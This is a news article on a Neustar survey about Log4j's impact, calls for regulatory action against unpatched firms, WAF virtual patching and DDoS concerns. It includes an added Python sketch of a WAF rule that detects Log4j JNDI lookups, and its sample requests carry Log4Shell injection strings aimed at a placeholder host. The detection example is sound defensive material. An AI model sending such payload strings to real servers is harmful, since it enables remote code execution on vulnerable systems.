Security officials want legal action for not fixing Log4j

The recently identified vulnerability in the Java Log4j logging package has created headaches for security professionals around the world. 61% of organizations responding to the latest Neustar International Security Council (NISC) survey, conducted in January 2022, said they had faced attacks targeting this vulnerability. An even larger share (75%) said they had been impacted by Log4j, with one in five (21%) saying the impact had been significant.

Log4j vulnerability reduced security professionals’ trust in open source tools

The most common impact of Log4j was the need for IT and security teams to work over the holidays to assess risk and make critical changes to protect infrastructure and data (52%), followed by reassessing software supply chain security practices (45%) and software purchasing decisions (44%). A significant share of respondents also decided to reassess existing vendor relationships (35%) or said the vulnerability reduced their trust in open source tools (34%).

87% of respondents said that given the level of cyber risk posed by Log4j, government regulatory agencies (such as the US Federal Trade Commission) should take legal action against organizations that fail to patch the flaw. In the words of one security professional, these organizations “may fail to secure and protect important customer data.” Another agreed: “It puts everyone at risk. We should have control over where our customers’ data ends up.” Another responded that companies big enough to fix the problem should do so and that the federal government should enforce this mitigation because “if they don’t, who will?”

“News of the Log4j threat has sent security and application teams around the world into a frenzy of activity – taking inventory of their internet-connected systems, checking Log4j, checking revision levels and putting emergency patches in place – and while many organizations have taken the appropriate proactive step to reach out to business partners and suppliers to assess potential exposure, timing has made it possible to address this much more difficult challenge,” said Carlos Morales, Senior Vice President of Solutions at Neustar Security Services.

Virtual patching to manage zero-day threats

For companies that have deployed Web Application Firewall (WAF) technology or outsource WAF functions to their cloud security providers, there may be a simple solution to manage zero-day threats like Log4j: the virtual patch.

“Virtual patches can trick any potential attacker into thinking that your apps aren’t vulnerable to a threat,” Morales added. “WAF solutions are deployed inline with web application traffic and act as reverse proxies between application clients and origin servers. The WAF terminates the connection with the client, ensures that the client does not perform any malicious actions, and then creates a separate connection with the server, bridging the data between the two. Since it terminates client traffic, the WAF can act on behalf of the origin server and cover any vulnerabilities that exist on the server. Virtual patching is one way to achieve this.”
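The inspect-then-forward decision described above can be sketched as follows. This is an added example, not code from Neustar or any WAF product: the rule names, the `decode` and `inspect` functions and the sample requests are constructed for illustration, and the patterns rely on the fact that Log4j resolves `${...}` lookups in the text it logs.

```python
import re
from urllib.parse import unquote

# Constructed rules for this example, not a vendor rule set.
# Log4j resolves "${...}" lookups in logged text; the JNDI lookup is the dangerous one.
# Nested lookups can hide the resolver name, so the second rule matches the
# lookup opener itself and accepts some false positives in exchange.
RULES = [
    ("jndi-lookup", re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)),
    ("lookup-expression", re.compile(r"\$\{")),
]
MAX_DECODE_PASSES = 3  # bound the work spent on repeatedly encoded input


def decode(value):
    """Undo percent-encoding, including double encoding, within a fixed bound."""
    for _ in range(MAX_DECODE_PASSES):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect(request):
    """Return (status, rule, field): 403 with the matching rule, or 200 to forward."""
    fields = [("path", request.get("path", "")), ("body", request.get("body", ""))]
    fields += [("header:" + k, v) for k, v in request.get("headers", {}).items()]
    for name, raw in fields:
        value = decode(raw)
        for rule, pattern in RULES:
            if pattern.search(value):
                return 403, rule, name  # blocked at the proxy, never reaches the origin
    return 200, None, None              # clean: open the separate origin connection


# Constructed sample requests (example.invalid is a reserved, non-routable name).
SAMPLES = [
    {"path": "/login", "headers": {"User-Agent": "${jndi:ldap://example.invalid/a}"}},
    {"path": "/search?q=%2524%257Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D", "headers": {}},
    {"path": "/report", "headers": {"X-Api-Version": "${date:yyyy}"}},
    {"path": "/price?max=%2420", "headers": {"User-Agent": "Mozilla/5.0"}},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample["path"], inspect(sample))
```

The returned rule and field names are what a WAF would write to its block log, which lets responders see which applications were probed while the underlying library is still being upgraded.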

In addition to Log4j, surveyed security professionals were asked about their other top concerns during the November and December 2021 reporting period. Distributed denial of service (DDoS) was ranked as the top concern by 21% of respondents, followed by ransomware and system compromise (both 18%).

Ransomware, DDoS attacks and targeted hacking were the threats most likely to be perceived as having increased over the reporting period. The threats organizations most focused their response capabilities on during this period were vendor or customer impersonation, targeted hacking, and ransomware.

Digging deeper into the top concern of survey participants – DDoS attacks – it was revealed that 84% of businesses had experienced a DDoS attack at some point. 57% of organizations surveyed said they outsource their DDoS attack mitigation, and 60% said it typically takes between 60 seconds and 5 minutes to initiate mitigation.
